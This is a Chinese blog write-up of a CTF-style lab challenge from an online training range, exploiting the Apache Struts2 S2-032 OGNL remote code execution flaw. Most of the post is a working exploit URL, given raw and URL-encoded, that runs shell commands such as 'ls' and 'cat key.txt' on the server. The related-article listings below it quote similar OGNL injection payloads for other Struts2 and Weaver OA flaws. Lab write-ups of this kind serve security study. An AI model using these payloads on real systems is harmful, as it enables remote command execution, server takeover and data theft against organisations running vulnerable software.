墨者学院之Apache Struts2远程代码执行漏洞(S2-032)复现

最新推荐文章于 2024-06-10 09:30:57 发布
最新推荐文章于 2024-06-10 09:30:57 发布
阅读量784 收藏 2
点赞数 1
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liangzi321321/article/details/101172307
版权

本题的解题方向是struts2的S2-032漏洞,启用动态方法调用时,可以通过方法:前缀执行远程代码执行。

method: < name > Action 前缀去调用声明为 public 的函数,但是在低版本 的Strtus2中并不会对 name 方法值做 OGNL 计算,反而在高版本中会进行计算。

 

其中需要利用exp进行实现:

首先构造poc

编码前:由编码后解析成的代码

?method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&pp=\A&ppp= &encoding=UTF-8&cmd=ls

ls可更换成其他命令

编码后:

?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=ls

在浏览器地址栏输入http://靶场ip/上面编码后的exp

查看key.txt的值

编码前:由编码后解析成的代码

?method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&pp=\A&ppp= &encoding=UTF-8&cmd=cat key.txt

 

编码后:

?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat key.txt

在浏览器地址栏输入http://靶场ip/上面编码后的exp

 

得到key值!

 

如果不知道exp怎么办,没关系,还有另一种办法,我们可以利用struts2的漏洞利用检查工具来进行一键式操作

提交方式修改成get方式,然后点击验证漏洞

得知有漏洞后,我们可以开始命令执行,在漏洞编号处选择刚才扫描出来的漏洞编号。输入ls命令,可以看到所有的文件。其中看到了key.txt文件。于是我们再输入cat key.txt命令查看该文件内容,得到了本题的key

 

二哈大叔
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-032(CVE-2016-3081)
qq_51577576的博客
11-25 500
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-032(CVE-2016-3081) Apache Struts 2是世界上最流行的Java Web服务器框架之一。Struts 2上存在高危安全漏洞(CVE-2016-3081,S02-32),黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有struts版本。
Struts2远程代码执行漏洞复现
02-04 514
Struts2远程代码执行漏洞介绍、原理和复现,以及怎么使用工具检测。
推荐使用Apache Struts:现代、强大的Java Web开发框架
gitblog_00074的博客
06-10 249
推荐使用Apache Struts:现代、强大的Java Web开发框架 项目地址:https://gitcode.com/apachestruts/struts Apache Struts是一个功能丰富且稳定的开源web框架,专为构建高质量的Java Web应用程序而设计。它遵循Model-View-Controller(MVC)架构模式,有助于开发者将业务逻辑、视图展示和控制流程代码有效地分离...
Struts2 S2-032漏洞复现
ZJT6666666的博客
01-04 507
Struts2 S2-032漏洞复现
CTF-Apache Struts2远程代码执行漏洞(S2-032)复现
asd158923328的博客
08-22 855
根据题意 漏洞原理:当启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式 任意命令执行Exp: %23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setChara...
墨者学院-Apache Struts2远程代码执行漏洞(S2-032)复现
JimWu的博客
09-04 687
Apache Struts2远程代码执行漏洞(S2-032)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理:由于启用动态方法调用时,可以通过方法:前缀执行远程代码执行。 1.打开靶场,了解S2-032漏洞原理。 2.构造POC,执行命令ls / %23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,...
Struts2-S2-032远程命令执行EXP
angaoux03775的博客
04-27 232
看到网上好多写的EXP有后门啊 还是自己写个吧! 工具下载:链接: http://pan.baidu.com/s/1miRbi2k 密码: fzfv 转载于:https://www.cnblogs.com/sevck/p/5438148.html...
Struts2 S2-005 远程代码执行漏洞——漏洞复现
weixin_42090431的博客
12-02 337
Apache Struts 2是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java ServletAPI,鼓励开发者采用MVC架构。缘起于Apache Struts的WebWork框架,旨在提供相对于Struts框架的增强和改进,同时保留与Struts框架类似的结构。2005年12月,WebWork宣布WebWork 2.2以Apache Struts 2的名义合并至Struts。2007年2月第一个全发布(full release)版本释出。
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求,攻击者可以执行任意Java代码。 3. **一句话Webshell后门**:这是一种简单的Web后门,仅用一行代码即可...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
2. **工具辅助**:使用SQL注入工具如SQLMap,可以帮助自动化执行上述步骤,快速获取所需信息。 3. **解密登录凭证**:在获取到数据库名以及其他可能有用的信息后,可以进一步尝试解密存储在数据库中的用户登录凭证...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
S2-032 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 1147
什么是STRUTS 2漏洞? Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2是Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 Struts2框架广泛应用于政府、公安、交通、金融行业和运...
S2-032 远程代码执行漏洞(CVE-2016-3081)
EC_Carrot的博客
08-11 412
漏洞简介 影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-032/README.zh-cn.md 漏洞复现 直接请求如下URL,即可执行id命令: http://your-ip:8080/index.action?method:%23_memberAccess%3d@ognl.OgnlCo
泛微 E-Mobile Ognl 表达式注入
m0_51747642的博客
07-30 3923
泛微OA办公系统是一款协调办公软件。 泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。 使用bp抓包 发送到重发器更改请求头为POST 一执行下面面的代码就直接执行命令了 message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse...
墨者Apache Struts2远程代码执行漏洞(S2-032)复现题解
zr1213159840的博客
01-15 2729
通过以下链接,能查到s2-032漏洞信息,我们按照这个指导进行。 https://github.com/vulhub/vulhub/blob/master/struts2/s2-032/README.zh-cn.md 首先对访问的页面进行抓包,然后填入以下poc index.action?method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@g
Struts2漏洞复现
qq_42383069的博客
01-05 3922
一. S2-016复现 打开测试靶场,测试该网站存在index.action路径 漏洞原理: 参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行 测试POC: 2.1 /index.action?redirect:%25{3*4} 2.2 /index.action?redirect:%25%7B3*4%7D (经Url编码) 返回12,说明命令被执行了,即存在该漏洞! 3. 使用K8工具测试: 二. S2-0
Structs2漏洞学习
痴人说梦梦中人
09-12 425
structs2-033漏洞利用: :%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0])...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,攻击者可能会尝试利用X-F字段进行SQL注入攻击。为了防止SQL注入攻击,开发人员应该合理地验证和过滤用户输入,并使用参数化查询或预编译语句来防止SQL注入攻击。此外,最好避免将用户输入直接拼接到SQL查询中。墨者学院可能提供相关的课程或教程来帮助开发人员学习和理解如何防止SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值